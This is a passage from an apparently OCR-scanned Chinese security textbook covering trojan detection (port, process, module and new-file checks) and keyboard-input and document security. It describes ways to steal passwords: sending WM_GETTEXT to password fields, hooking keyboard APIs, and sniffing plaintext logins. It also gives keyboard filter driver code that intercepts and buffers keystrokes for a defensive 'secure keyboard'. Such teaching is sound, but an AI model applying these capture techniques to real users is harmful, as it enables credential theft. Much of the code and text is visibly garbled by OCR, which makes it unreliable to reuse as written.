char *icon: Wicon 是 图 标 文件 
icon="C:\\masm615\\bin\\cv.ico"; // 可 以 换 成 桌面 的 图 标 
exp=".uni"; // 记 得 加 点 

exefile=a; 

this->Relate(exp.exefile.icon): 

) 


BOOL CRegeditDlg::Relate(char *exp. char *exefile, char *icon) 
t 

HKEY hMakeKey.hRootKey=HKEY CLASSES ROOT: 

CString strl.str3.str4: 

strl.Format( T("%s").exp): 
Str3="\\shell\\open\\command"; 

str4="\\DefaultIcon"; 
str3=strl+str3; 
str4-str] *str4: 
zRegCreateKey(hRootKey,str3,&hMakeKey): 
zRegCreateKey(hRootKey,str4,&hMakeKey): 
zRegSetValu(HKEY CLASSES ROOT.str3, REG. SZ.exefile , strlen(exefile) + 1); 
zRegSetValu(HKEY CLASSES ROOT.str4, REG SZ.icon , strlen(icon) + 1): 
retum true; 


) 
可 看 到 如 图 4-3 所 示 的 注册 表 内 容 。 这 里 需要 注意 ， 可 执行 文件 必须 在 系统 路 径 下 。 
”编辑 E) FEV হি &) HHW 
由 国 UmüutlookAddin.PlayOnPhoneDlg | 名 称 类 型 数据 
由 国 UagutlookAddin PlayOnPhoneDlg. 1 | [abp] MMV) REG SZ — e:Mdocs regedit. exe 
m Cg wi 
(Gl DefaultIcon 
= GJ] shell 
m Gl open 


am | 
图 4-3 关联 后 的 位 置 


44 检测 木马 的 常用 方法 


检测 木马 的 常用 方法 包括 新 建文 件 的 检测 、 文 件 校 验 值 的 检测 、 内 存 进 程 检测 、 内 存 
进程 中 的 模块 检测 和 端口 检测 。 


44.1 ”端口 检查 
枚 举 本 机 的 连接 情况 可 以 使 用 如 下 函数 : 
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GetTcpTable(): / 取得 TCP 连接 表 
GetUdpTable(): / 取得 UDP 监听 者 表 
GetIpStatistics(): I WA P hegit 
GetlempStatisticsQ: // 取得 ICMP 统计 情况 
GetTcpStatistics0: — // 取得 TCP 统计 情况 
GetUdpStatistics0: — // 取得 UDP 统计 情况 


通过 Detours 开发 模块 HOOK 函数 bind 可 以 获取 哪些 进程 在 使 用 哪个 端口 .代码 如 下 : 
DETOUR TRAMPOLINE(int WINAPI Real bind(SOCKET s.const struct sockaddr FAR* name.int 
namelen).bind): 
int WINAPI Mine bind(SOCKET s.const struct sockaddr FAR* name.int namelen) 
{ 
wchar t pname[260]={0}: 
GetModuleFileNameW(NULL.pname,260): 
OutputDebugStringW(pname): 
sockaddr in* p-(sockaddr in*)name; 
swprintf(pname,L'bing:port-*?od,ip-?6X",p-^sin portp-»sin addr.S un.S addr); 
OutputDebugStringW(pname): 
retum Real bind(s.name.namelen): 
) 


如 图 4-4 所 示 的 是 检测 到 的 端口 与 进程 的 关联 情况 。 请 注意 要 先 运行 调试 输出 工具 
dbgview。 


YN (local) 


um RS-A CEC] ক a 


# Tine Debug Print 
0. 00000000 [1496] D: \nyproc\VC_QQ\Debug\VC_QQ. exe 
0. 00028272 [1496] bing:port=28695, ip=0 


18. 04027557 [1496] D: \nyproc\VC_QQ\Debug\VC_QQ. exe 
18.04031372 [1496] bing:port=28951, ip=0 
70.92041016 [892] C:VProgram Files\Tencent\QQ\Bin\QQ. 
70.92043304 [892] bing:port=0, ip=0 


图 4-4 ”进程 与 端口 关联 


442 ”进程 检查 


通常 采用 枚 举 进程 的 方式 。 函 数 EnumProcesses 可 以 枚 举 进程 。 下 面 的 代码 可 以 枚 举 
所 有 进程 ， 并 获取 对 应 的 文件 名 。 完 整 代码 见 “扫描 内 存 与 内 存 数据 读 写 ”。 
void CDoProcessDlg::OnGetProcess() 
t 
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DWORD aProcesses[1024]. cbNeeded. cProcesses: 
unsigned int i: 
// 枚 举 系统 进程 人 D 列表 
这 !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )return: 
// Calculate how many process identifiers were returned. 
/计算 进程 数量 
cProcesses = cbNeeded / sizeofDWORD): 
/ 输出 每 个 进程 的 名 称 和 ID 
for (i= 0: i < cProcesses: i++ )PrintProcessNameAndID( aProcesses[i].i): 
) 
void CDoProcessDlg::PrintProcessNameAndID( DWORD processID „int n) 
{ 
char szProcessName[MAX PATH] = "unknown": 
/取得 进程 的 句柄 
HANDLE 
hProcess=OpenProcess( PROCESS QUERY INFORMATION|PROCESS VM READ.FALSE processID): 
// 取 得 进程 名 称 
if ( hProcess ) 
t 
HMODULE hMod: 
DWORD ০৩৫৩৫: 
if(EnumProcessModules( hProcess, &hMod. sizeof(hMod), &cbNeeded) ) 
//GetModuleBaseName( hProcess, hMod. szProcessName, sizeof(szProcessName) ): 
/该 函数 得 到 进程 文件 名 
GetModuleFileNameEx(hProcess.hMod.szProcessName. sizeof(szProcessName)): 
/该 函数 得 到 进程 全 文件 名 路 径 
// 回 显 进程 名 称 和 人 D 
CString inf0,infl inf? inf3; 
infü.Format("96d".hProcess): 
infl.Format("96s" szProcessName): 
inf2.Format("*od".processID): 
m 1CtrlInsertItem(0."):// 插 入 行 
m ICtrl.SetltemText(0.0.inf0): 
mL_lCtrlSetItemText(0.1.inP)/ 设 置 该 行 的 不 同 列 的 显示 字符 
m ICtrl.SetltemText(0.2.inf1): 
m ICtrl.SetltemText(0.3.inf3): 
CloseHandle( hProcess ): 
) 
) 


如 图 4-5 所 示 的 就 是 枚 举 到 的 进程 。 
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进程 ID | 路径 

4488 — e:\ 书 \ 源 代码 \ 扫 描 内 存 与 内 存 数据 读 写 \Debug\DoProcess. exe 
4252 C:\Program Files\Microsoft Visual Studio 9. 0\Common7\ic 
1056 C:\Program FilesVMlicrosoft Visual Studio 9. 0\Common7NII 
3808 — C:WINDOWSWnotepad. exe 

3176 C:\Program FilesVXSogouInput V6. 1. 0. 6700৬508040] 03. exe 
3524 C:\Program Files\Microsoft OfficeVOfficel2WINWORD.EXE 
3468 C:\Program FilesValipayMntiPhishingVntiPhi shi ngEngine 
1504 C:\Program Files\Internet ExplorerMexplore. exe 

1596 C:\Program Files\Internet ExplorerMexplore. exe 

140 C: WINDOWS Vsystem32Vconime. exe 


图 4-5 枚 举 到 的 进程 


也 可 以 用 CreateToolhelp32Snapshot/Process32First/Process32Next API 枚 举 系统 进程 。 
如 果 有 可 疑 进程 , 可 以 调用 进程 TerminateProcess. OpenProcessToken. LookupPrivilege- 
Value, AdjustTokenPrivileges 来 完成 。 其 中 ,后 ও 个 函数 用 来 调整 操作 结束 进程 的 优先 级 。 


4.4.3 ”进程 调用 模块 检查 


-个 程序 运行 ， 总 是 需要 调用 其 他 动态 链接 库 。 木 马 经 常 把 动态 链接 库 文件 加 载 到 其 
他 进程 。 如 果 发 现 了 陌生 的 模块 ， 说 明 可 能 是 被 怀疑 对 象 。 对 于 难以 删除 的 模块 ， 可 以 用 
U 盘 启 动 系统 , 到 另 一 个 系统 下 删除 。 函 数 OpenProcess、VirtualQueryEx、GetModuleFileName 
可 以 获取 一 个 进程 调用 的 所 有 模块 。 主 要 代码 如 下 : 


if((hprocess-OpenProcess(«PROCESS ALL ACCESS.FALSE.processID))—NULL) 
£ 
AfxMessageBox(" 打 开 进 程 失败 "); 
/可 能 需要 提升 本 进程 的 权限 
retum; 
} 
// 枚 举 内 存 
MEMORY BASIC INFORMATION mbi: 
PBYTE ptr = NULL: 
DWORD dwBytesRetum = sizeoffMEMORY BASIC INFORMATION): 
char szBuffer[256* 100]: 
char szModuFile[256]: 
char szTmpBuffer[256]: 
memset(szBuffer.0.256*100): 
memset(szTmpBuffer.0.256): 
int n=1:CString din: 
CString old: 
while( dwBytesReturn 一 sizeof$MEMORY BASIC INFORMATION) ) 
t 
memset(szModuFile.0.256): 
dwBytesReturn = VirtualQueryEx(hprocess.ptr.&mbi.sizeof 
(MEMORY BASIC INFORMATION) ): 
if(mbi.Type = MEM FREE ) mbi.AllocationBase = mbi.BaseAddress: 
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GetModuleFileNameEx(hprocess.(HMODULE)mbi.AllocationBase.szModuFile.256): 
ptr += mbi. RegionSize: 
ifstlen(szModuFile)--l)continmee; /不 能 是 等 于 0， 竟 然 有 问号 
CString mid=szModuFile; 
mid.MakeLower(): 
if(old—mid)continue: 
old-szModuFile: 
old. MakeLower(): 
if(old.Find(" exe".0)!—1)continue: 
wsprintf(szTmpBuffer,"%63d) 模 块 名 =%s. 开 始 地 址 =%8X", 
D++,SZModuFile.ptr-mbi RegionSize): 
m list.AddString(szTmpBuffer): 
) 


程序 运行 结果 如 图 4-6 所 示 。 


和 

e:\docs\ 我 的 资料 \ 我 的 书 \ 信 息 安全 款 学 \ 木 马 与 远程 控制 \ok 扫 描 内 存 与 
C:\Program Files\Microsoft Visual Studio 9. 0\CommonT\ide\nsp: 
C:\Program Files\Microsoft Visual Studio 9. 0\CommonT\IDE\ dev: 
C:\JCB_2YZQ_ZB\TDXW. EXE 

C:\Program Files\Common Files\Microsoft Shared\Help 9\dexplo: 
P Files\Internet ExplorerViexplore. exe 


MProgram Files\Microsoft OfficeVOfficel2WWINWORD.EXE 
C: \WINDOVWS\ syst en32Xntvdn. exe 

C: \WINDOWS\ syst em32\.cnd. exe 

C: WINDOWSXsysten32Xconime. exe 

C:\Program Files\Internet ExplorerMiexplore. exe 
C:\Program Files\Internet Explorer Miexplore. exe 
C:\Program Files\Internet ExplorerMiexplore. exe 


:\Program FilesVSogouInputV6. 1. 0. 6700\Resource. dll, DO 
\Program FilesXSogouExtensionVsogouflashVl. 0. 0. 102XSogouFlashD11 

\WINDOWS\ syst em32\ SOGOUPY. IME, feik- 10080000 

\WINDOVS\AppPat ch\AcGenral. DLL, 开始 地 址 =58FB0000 

\WINDOWS\system32\UxTheme. d11, 开始 地 址 =5&ADC0000 

\WINDOWS\system32\ShimEng. d11, 开始 地 址 =5CC30000 

\WINDOWS\ syst em32\LPK. DLL, 开始 地 址 =62C20000 

\WINDOWS\ system32\SAMLIB. 411, 开始 地 址 =71B70000 

\VINDOVS\ syst em32\WINSPOOL. DRY, F: 72F70000 
\VINDOVS\systen32\nsctfine. ine, 开始 地 址 =73640000 

: \WINDOVS\ syst en32\USP10. d11, 开始 地 址 =73FA0000 


图 4-6 枚 举 进程 内 的 模块 


44.4 新 建文 件 检查 


新 建文 件 可 以 用 HOOK 函数 CreateFile 或 ZwCreateFile 函数 进行 监视 甚至 也 可 以 禁止 
新 建 。 当 然 ， 还 可 以 在 文件 过 滤 驱 动 中 捕捉 新 建文 件 信息 ， 再 微 过 滤 的 例 程 。 


FLT PREOP CALLBACK STATUS NPPreCreate ( 
. inout PFLT CALLBACK. DATA Data, 

. inPCFLT RELATED OBJECTS FltObjects, 

. deref out opt PVOID *CompletionContext 

) 
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{ 
ULONG flags-0: 
flags =(Data->Iopb->Parameters.Create.Options>>24) & 0x000000ff: 
if(flass—FILE CREATE)|| (flass—FILE OPEN IF) || 
(flags—FILE OVERWRITE IF){ 
/说明 是 新 建文 件 
// 如 果 扩 展 名 是 exe， 可 以 禁止 新 建 
Data->IoStatus.Status = STATUS ACCESS DENIED: 
Data->IoStatus Information = 0: 
return FLT PREOP COMPLETE: 


) 
Y 
45 小 结 
本 章 的 重点 是 借助 森马 的 原理 ， 介 绍 远程 控制 如 何 传 文件 和 传 控制 命令 ， 如 何 实现 鼠 


标 、 键 嚼 和 屏幕 的 远程 控制 。 还 介绍 了 如 何 从 进程 、 进 程 调用 模块 、 新 建文 件 和 网 络 端口 
去 捕捉 木马 信息 。 


4.6 习题 


1. 能 否 在 传 文件 的 基础 上 ， 实 现 断 点 续 传 ? 
2. 完善 本 章 的 键盘 钩子 ， 使 其 能 实现 远程 汉字 输入 。 
3. 完善 本 章 的 禁止 新 建文 件 的 例子 ， 禁 止 在 Windows 目录 下 生成 新 文件 。 


第 5 章 ”文档 安全 


本 章 介绍 如 何 保护 文档 的 安全 ， 主 要 内 容 如 下 : 

° 信息 的 生命 周期 是 如 何 保护 安全 的 ? 

。 如 何 让 键盘 输入 安全 ? 

° 如何 控制 单位 和 个 人 的 文档 不 外 汇 ? 

e ”如 何 控制 服务 器 上 的 文档 对 管理 员 也 是 安全 的 ? 
° ”外 发 的 文档 如 何 处 于 可 控 状 态 ? 


5.1 文档 安全 概述 


文件 档案 , 简称 文档 。 有 纸 质 的 和 电子 的 ， 如 WPS 文件 、Office 文件 、 图 片 等 。 本 章 
所 涉及 的 文档 是 电子 文档 。 非 结构 化 数据 (unstmuctured data) 是 描述 所 有 不 在 数据 库 (database) 
内 信息 的 一 个 通用 标签 。 非 结构 化 数据 可 以 是 文本 的 ， 也 可 以 是 非 文本 的 。 文 档 就 是 非 结 
构 化 数据 的 一 种 。 

知识 经 济 时 代 ， 企 业 的 核心 竞争 力 将 更 多 地 来 自 技 术 发 明 、 专 利 、 创 新 等 “ 软 资产 ”， 
随 着 信息 系统 应 用 的 普及 ， 这 些 “ 软 资产 ”体现 为 大 量 的 电子 文档 。 在 日 常 工作 中 ， 需 要 
数 十 甚至 数 百 位 员工 协同 工作 ， 不 可 避免 地 需要 涉及 机 密 电子 文档 ， 如 何 很 好 地 保护 这 些 
重要 资料 ， 成 为 摆 在 企业 面前 的 一 个 难题 。 

要 保证 文档 的 安全 , 应 该 是 基于 信息 生命 周期 的 安全 。 信息 生命 周期 是 信息 (包括 文档 ) 
从 产生 到 销毁 这 么 一 个 过 程 的 安全 。 包括 系统 的 安全 登录 、 客 户 端 防 泄漏 、 网 络 传输 保密 、 
文件 服务 器 上 安全 存储 、 外 发 时 仍然 处 于 可 控 状 态 等 方面 的 安全 。 

文档 安全 涉及 很 多 方面 的 安全 产品 ， 实 现 方式 也 不 一 定 完全 相同 。 
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文档 安全 管理 系统 一 般 是 需要 密码 登录 的 。 密 码 登 录 就 涉及 到 安全 防止 窃取 密码 的 问 
题 。 某 知名 文档 安全 管理 产品 ， 笔 者 拿 它 进 行 测试 ， 很 轻松 地 可 以 拿 到 它 的 密码 发 到 指定 
的 邮箱 ， 说 明 其 就 是 不 安全 的 。 

键盘 数据 的 接收 由 PC 机 8255 可 编程 芯片 来 实现 的 。 在 键盘 内 部 有 一 个 微 处 理 器 
INTEL 8048， 它 从 系统 板 接收 时 钟 信号 ， 读 取 每 个 输入 的 键 值 ， 将 键 的 扫描 码 送 到 8255 
的 PA 端口 (60H) 内 , 同时 产生 一 个 中 断 号 为 9 的 中 断 。 PB 端口 (61HD 的 第 7 位 用 来 控制 PA 
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端口 数据 的 接收 ， 该 位 为 0 时 表示 允许 键盘 和 输入， 为 1 时 表示 禁止 键盘 输入 。 中 断 9 的 任 
务 是 : 读 取 扫描 码 并 把 应 答 信号 送 到 键盘 ， 把 扫描 码 转换 为 字符 码 或 控制 变换 键 和 将 字符 
码 放 入 键盘 缓冲 区 内 。BIOS 中 断 16H 可 以 从 键盘 缓冲 区 读 取 键 盘 信息 。 


5.2.1 键盘 输入 安全 状况 分 析 


微软 的 窗口 程序 是 基于 消息 的 ， 子 窗口 也 是 基于 消息 的 。 一 般 密码 输入 的 控件 EDIT 
类 型 的 子 窗口 有 一 条 消息 叫 WM_GETTEXT， 如 果 向 编辑 框 窗口 发 送 WM_GETTEXT 消 
息 ， 就 可 以 把 密码 取出 。 通 常 截取 密码 的 原理 是 这 样 的 ， 首 先 枚 举 所 有 的 子 窗口 ， 再 找 出 
所 有 的 EDIT 类 型 可 编辑 窗口 ， 再 找 出 所 有 拥有 “ES_PASSWORD ”属性 的 窗口 。 
ES PASSWORD 属性 即 为 密码 输入 窗口 。 然后 一 直 向 该 子 窗口 调用 函数 SendMessage 发 送 
WM_GETTEXT 消息 ， 就 可 以 轻松 取 到 密码 。 

第 二 种 方法 是 挂钩 键盘 和 输入 的 API 函数 。 微 软 提供 了 HOOK 功能 ， 以 扩展 程序 功能 。 
但 HOOK 也 给 黑客 带 来 了 方便 。 如 果 HOOK 键盘 输入 函数 ， 在 键盘 输入 时 ， 键 盘 信息 先 
传 到 黑客 程序 ， 再 传 到 EDIT 密码 控件 ， 软 键盘 更 不 安全 。 很 多 开发 者 使 用 随机 产生 按键 
位 置 的 软 键盘 来 防止 键盘 拦截 。 其 实 ， 软 键盘 更 不 安全 。 如 果 在 密码 输入 时 ， 黑 客 首先 截 
屏 ， 然 后 跟踪 鼠标 移动 位 置 和 拦截 鼠标 左 键 单 击 过 程 并 记录 。 回 放 整 个 过 程 ， 可 以 轻松 地 
获取 密码 。 

目前 绝 大 多 数 网 站 服务 商 使 用 没有 经 过 保护 的 EDIT 控件 来 输入 密码 ， 然 后 又 使 用 明 
文 来 传递 密码 ， 实 在 没有 安全 可 言 。 下 面 举 两 个 例子 。 如 图 5-1 所 示 演 示 了 密码 很 容易 被 
截取 。 登 录 时 密码 信息 的 传输 没有 被 加 密 ， 容 易 被 嗅 探 ( 嗅 探 见 网 络 安全 一 章 )。 如 图 5-2 
所 示 的 是 测试 另 一 个 知名 网 站 的 密码 的 安全 性 。 先 运行 一 个 嗅 探 程序 程序 ， 然 后 打开 某 个 
网 页 ， 使 用 其 提供 的 免费 邮箱 。 输 入 用 户 名 为 “lishimm”， 口 令 为 “3.14159”。 登 录 成 
功 后 关闭 。 用 嗅 探 程序 可 以 看 到 如 图 5-3 所 示 的 信息 ， 可 见 密码 是 使 用 明文 传输 的 。 为 了 
不 引起 麻烦 ， 将 其 单位 名 称 和 域名 抹 去 了 。 

再 来 测试 一 下 某 知名 软件 密码 输入 的 安全 性 。 先 开启 “紫光 慧 图 安全 键盘 保护 ”测试 
软件 ， 再 将 光标 进入 密码 框 时 ， 单 击 “开始 保护 ”按钮 ， 在 密码 输入 结束 后 ， 单 击 “ 结 束 
监控 ”按钮 ， 可 以 发 现 ， 很 轻松 地 拦截 到 了 密码 ， 如 图 5-4 所 示 。 

再 来 测试 一 下 某 银行 的 密码 输入 的 安全 性 。 插 入 银 盾 后 ， 在 进行 交易 时 需要 输入 银 盾 
的 密码 ， 此 时 开始 拦截 。 回 车 后 提取 密码 ， 发 现 截取 的 密码 为 “436742”， 如 图 5-5 所 示 。 

从 以 上 例子 可 看 出 ， 基 于 微软 EDIT 控件 的 密码 输入 框 的 安全 性 远 远 不 够 ， 很 容易 被 
黑客 拦截 。 
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522 键盘 输入 安全 解决 方式 


安全 键盘 用 于 保障 键盘 密码 的 安全 输入 、 安 全 传输 。 安全 键盘 接管 操作 系统 部 分 功能 ， 
使 键盘 输入 信息 无 法 被 黑客 软件 截取 。 对 获取 的 按键 信息 进行 加 密 后 传输 ， 使 黑客 即使 使 
用 嗅 探 软件 也 无 法 截取 到 密码 信息 。 同 时 ， 安 全 键盘 可 以 在 Windows XP/Vista/Win7 等 操 
作 系 统 下 稳定 地 工作 ， 对 其 他 正常 软件 无 影响 。 原 理 图 如 图 5-6 所 示 。 
登录 名 : [ 找 回 登 录 名 ] 


Bn B: 0377 Sa cours 
记 住 我 的 用 户 名 

登录 
图 5.6 “安全 键盘 演示 


回 


键盘 驱动 挂 接 操作 系统 的 键盘 驱动 ， 拦 截 来 自 键盘 8255 端口 的 键盘 数据 ， 存 在 自己 
的 缓冲 区 中 。Activex BIE 5-6 中 的 COM， 当 输入 光标 进入 密码 框 时 ， 通 知 驱动 开始 拦截 
键盘 输入 ， 当 光标 离开 密码 框 时 ， 暂 停 密码 拦截 ， 当 单 击 “ 登 录 ” 按 钮 时 ， 提 取 驱 动 栏 截 
到 的 密码 ， 并 加 密 发 送 到 服务 器 。 保 障 安全 输入 的 方法 是 从 操作 系统 的 最 低 端 拦截 键盘 输 
入 ， 保 障 安全 传输 的 方法 是 密码 在 Activex 中 加 密 后 再 发 送 ， 到 服务 器 后 再 解密 。 当 驱动 
处 于 拦截 密码 的 状态 时 ， 操 作 的 过 程 是 ， 拦 截 字符 键 存放 到 自己 的 缓冲 区 ， 同 时 将 字符 键 
变换 为 其 他 键 。 这 样 ， 即 使 有 黑客 程序 要 拦截 ， 拦 截 到 的 也 是 虚假 的 按键 信息 。 

1. 驱动 控制 分 析 


驱动 有 3 个 动作 : 开始 拦截 、 暂 停 拦 截 和 停止 拦截 。 开 始 拦截 时 建立 自己 的 缓冲 区 1024 
字 节 、 初 始 化 缓冲 区 按键 数 指针 、 拦 截 按键 在 入 缓冲 区 、 将 按键 变换 为 其 他 键 后 传 给 操作 
系统 。 用 4 表示 和 暂停 拦截 ，5 表示 开始 拦截 ， 用 6 表示 停止 拦截 ， 则 底层 的 代码 如 下 : 
PCHAR pKeyBuf-NULL: /键盘 缓冲 区 
ULONG kPointer-0: /指向 缓冲 区 的 位 置 
ULONG  isDoing=0: /是否 开始 监控 
在 初始 化 例 程 里 面 给 pKeyBuf 分 配 内 存 空间 。 每 当 按 下 一 个 键 ， 就 会 调用 例 程 
KeyBoardFilterReadDispatch， 在 该 例 程 里 面 挂 接 一 个 方法 来 拦截 键盘 ， 代 码 如 下 : 
IoSetCompletionRoutine(Irp.IoCompletionRead NULL.TRUE.TRUE. TRUE): 
挂 接 的 方法 为 IoCompletionRead。 在 该 方法 中 ， 调 用 自 定义 的 分 析 函 数 。 自 定义 分 析 
函数 进行 如 下 处 理 : 
这 ch>32 && ch<127){ ”// 判 断 是 否 为 有 效 字符 ， 是 则 如 下 处 理 
这 (kb status&S SHIFT) && (kb status&S CAPS) 
&&(ch»—0x41 && ch--0x5a))h--0x20: // 是 否 按 了 SHIFT 或 CAPS 
if((kb status&S SHIFT)—20) && ((kb status&S CAPS)—90) &&(ch»-0x41 
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&& ch«-0x5a))ch*—-0x20: 
pKeyBuf[kPointer]-ch : /把 按键 存 入 缓冲 区 
kPointer++; /按键 指针 递 加 


keyData->MakeCode=0x4E: // 把 按键 变换 后 传 给 操作 系统 
} 


2. Activex 控制 过 程 分 析 


Activex 有 4 个 动作 : 初始 化 打开 驱动 、 命 令 驱 动 开 始 拦 截 、 命 令 驱 动 暂停 拦截 、 命令 
驱动 返回 键盘 信息 ， 加 密 后 将 密码 返回 给 ASP 程序 。4 个 动作 封装 为 以 下 4 个 方法 。 


bool OpenDriver0 // 打 开 驱 动 
{ 
SECURITY ATTRIBUTES attr = new SECURITY ATTRIBUTESO; 
handlel = CreateFile("WWKbdFilterDev", // 这 是 驱动 的 名 字 
GENERIC READ |GENERIC WRITE, 
FILE SHARE READ. 
ref attr, 
OPEN EXISTING. 
FILE ATTRIBUTE NORMAL, 
0): 
if(handlel — INVALID HANDLE VALUE) retum false; 
else retum true; 


) 


unsafe public bool Start0 /开始 拦截 键盘 
{ 
if (flags — false) 
{ 
if (OpenDriver() = false) 
t 
return false; 

x 

SendZero(): 
flags = true: 

) 

uint dwOutput = 0: 

uint info = 5; 

uint yy = (uint)(&info): 

intIOCTL FILE isWorkingTRUE = CTL_CODE((int) FILE DEVICE 
. KEYBOARD. 0x804, METHOD BUFFERED. FILE READ ACCESS | 
FILE WRITE ACCESS): 
if (false = DeviceloControl(handlel, IOCTL FILE isWorkingTRUE. yy. 4. 0. 0. out dwOutput. 
IntPtr.Zero)) return false: 

return true; 


) 
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unsafe public bool Pause) // কি 
{ 
uint dwOutput = 0: 
uint info = 4: 
uint yy = (uint)(&info): 
int IOCTL FILE isWorkingTRUE = CTL CODE((int)FILE DEVICE KEYBOARD, 
0x804, METHOD BUFFERED, FILE READ ACCESS | FILE WRITE ACCESS); 
if (false = DeviceloControl(handlel, IOCTL FILE isWorkingTRUE. yy. 4. 0, 0. out 
dwOutput, IntPtr.Zero)) return false: 


return true; 


unsafe public string GetData() /从 驱动 提取 密码 信息 

{ 

uint dwOutput = 0: 

uint info = 6; 

byte[] b = BitConverter.GetBytes(info): 

byte[] bout = new byte[1024]: 

System.IntPtr yy = Marshal.UnsafeAddrOfPinnedArrayElement(bout. 0): 

Array.Clear(bout. 0, 1024): 

Array.Copy(b. bout, b.Length): 

int IOCTL FILE isWorkingTRUE = CTL CODE(Gnt)FILE DEVICE KEYBOARD, 
0x804, METHOD BUFFERED. FILE READ ACCESS | FILE WRITE ACCESS): 

if (false = DeviceloControl(handlel, IOCTL FILE isWorkingTRUE, (uint)yy. 1024, (uint)yy. 1024, 

out dwOutput, IntPtr.Zero)) retum "": 

userkey = Encoding.Default.GetString(bout): 

retum userkey; /密码 在 此 

) 


3. ASP 调用 Activex 控件 过 程 分 析 


ASP 负责 监控 光标 进入 密码 输入 框 、 离 开 密码 输入 框 和 单 击 “ 登 录 ” 按 钮 。 关 键 代 码 
如 下 : 
// 密 码 框 有 输入 焦点 后 的 处 理 
function getFocus() 
{ 
var txt-document.getElementById( TextBox1").value: 
if(txt—") 
t 
document.getElementByld("TextBox1").focus(: 
return false: 
) 
else{ 


var re-XPCom.Start(): ) /开始 监控 
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/密码 框 失去 焦点 后 的 处 理 
function leaveFocus() 
í 
var e-XPCom.Pause(): /暂停 监控 
) 


// 单 击 “ 登 录 ” 按 钮 后 的 事件 处 理 程序 
function enterEve() 

í 

var s1=XPCom.GetData0: /提取 密码 
alert( 密 码 是 : sl): 
document.getElementByld('txtPwd').value="; 
} 


完整 的 代码 见 “ 键 盘 监 控 ”。 


53 ”客户 端的 防 泄露 


个 人 计算 机 需要 防止 个 人 的 私密 文件 在 计算 机 被 盗用 、 丢 失 等 情况 下 文档 不 被 他 人 看 
到 。 企 业 员 工 在 使 用 单位 文档 ， 尤 其 在 上 网 、 使 用 USB 盘 时 ， 企 业 既 要 保证 员工 方便 使 用 
信息 资源 如 上 网 ， 又 要 防止 员工 通过 网 络 把 文档 泄漏 出 去 ， 这些 都 涉及 客户 端的 防 泄漏 。 
目前 有 很 多 客户 端 防 泄漏 产品 。 它 们 的 做 法 一 般 是 使 用 透明 加 密 、 虚 拟 技术 等 方法 。 


5.3.1 透明 加 密 


透明 加 密 技术 是 近年 来 针对 企业 文件 保密 需求 应 运 而 生 的 一 种 文件 加 密 技术 。 所 谓 透 
明 ， 是 指 对 使 用 者 来 说 文件 的 加 密 解密 是 未 知 的 。 当 使 用 者 在 打开 或 编辑 指定 文件 时 ， 系 
统 将 自动 对 未 加 密 的 文件 进行 加 密 ， 对 已 加 密 的 文件 自动 解密 。 文 件 在 硬盘 上 是 密 文 ， 在 
内 存 中 是 明文 。 一 旦 离开 使 用 环境 ， 由 于 应 用 程序 无 法 得 到 自动 解密 的 服务 而 无 法 打开 
从 而 起 到 保护 文件 内 容 的 效果 。 

其 主要 特点 是 : 

强制 加 密 。 安 装 系统 后 ， 所 有 指定 类 型 文件 都 是 强制 加 密 的 ; 使 用 方便 。 不 影响 原 有 
操作 习惯 ， 不 需要 限制 端口 。 

本 单位 内 交流 无 碍 。 内 部 交流 时 不 需要 作 任 何 处 理 便 能 交流 。 

对 外 受阻 。 一 旦 文件 离开 使 用 环境 ， 文 件 无 法 被 打开 ， 从 而 保护 知识 产权 。 

透明 加 密 的 关键 技术 是 文件 过 滤 。 文 件 过 滤 是 系统 驱动 的 一 种 。 它 工作 于 Windows 
的 底层 。 通 过 监控 应 用 程序 对 文件 的 操作 ， 在 打开 文件 时 自动 对 密 文 进行 解密 ， 在 写 文件 
时 自动 将 内 存 中 的 明文 加 密 写 入 存储 介质 。 从 而 保证 存储 介质 上 的 文件 始终 处 于 加 密 状 态 。 
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文件 的 透明 加 密 也 可 以 通过 HOOK 函数 ReadFile 和 WriteFile 等 函数 从 应 用 层 实现 。 
透明 加 密 主要 监视 系统 中 的 进程 , 即 哪个 进程 在 进行 文件 操作 、 对 文件 的 读 和 写 操作 。 
主要 涉及 的 技术 问题 有 : 在 加 密 过 的 文档 中 添加 标志 ， 表 示 已 经 加 密 过 了 ; 读 文 件 时 
解密 ， 写 文件 时 加 密 。 


5.3.2 ”虚拟 化 技术 


虚拟 化 (Virtualization) 技 术 最 早出 现在 20 世纪 60 年 代 的 IBM 大 型 机 系统 ， 在 20 世 
纪 70 年 代 的 System 370 系列 中 逐渐 流行 起 来 ， 这 些 机 器 通过 一 种 叫 虚拟 监控 器 (Virtual 
Machine Monitor，VMM) 的 程序 在 物理 硬件 之 上 生成 许多 可 以 运行 独立 操作 系统 软件 的 虚 
拟 机 (Virtual Machine) 实 例 。 

借助 虚拟 化 ， 用 户 可 以 在 单 台 物 理 机 上 运行 多 个 虚拟 机 ， 每 个 虚拟 机 都 可 以 在 多 个 环 
境 之 间 共 享 同 一 台 物理 机 的 资源 。 不 同 的 虚拟 机 可 以 在 同一 台 物理 机 上 运行 不 同 的 操作 系 
统 以 及 多 个 应 用 程序 。 

随 着 近年 多 核 系统 、 集 群 、 网 格 甚至 云 计算 的 广泛 部 署 ， 虚 拟 化 技术 在 商业 应 用 上 的 
优势 日 益 体现 ， 不 仅 降低 了 IT 成 本 ,而且 还 增强 了 系统 安全 性 和 可 靠 性 ， 虚 拟 化 的 概念 
也 逐渐 深入 到 人 们 日 常 的 工作 与 生活 中 。 

虚拟 化 是 一 个 广义 的 术语 ， 对 于 不 同 的 人 来 说 可 能 意味 着 不 同 的 东西 ， 这 要 取决 他 们 
所 处 的 环境 。 在 计算 机 科学 领域 中 ， 虚 拟 化 代表 着 对 计算 资源 的 抽象 ， 而 不 仅仅 局 限于 虚 
拟 机 的 概念 。 例 如 对 物理 内 存 的 抽象 ， 产 生 了 虚拟 内 存 技术 ， 使 得 应 用 程序 认为 其 自身 拥 
有 连续 可 用 的 地 址 空间 (Address Space)， 而 实际 上 ， 应 用 程序 的 代码 和 数据 可 能 是 被 分 隔 
成 多 个 碎片 页 或 段 ， 甚 至 被 交换 到 磁盘 、 闪 存 等 外 部 存储 器 上 ， 即 使 物理 内 存 不 足 ， 应 用 
程序 也 能 顺利 执行 。 

虚拟 化 技术 主要 分 为 以 下 几 个 大 类 : 

e 平台 虚拟 化 (Platform Virtualization)， 针 对 计算 机 和 操作 系统 的 虚拟 化 。 

e 资源 虚拟 化 (Resource Virtualization)， 针 对 特定 的 系统 资源 的 虚拟 化 ， 比 如 内 存 、 

存储 、 网 络 资源 等 。 

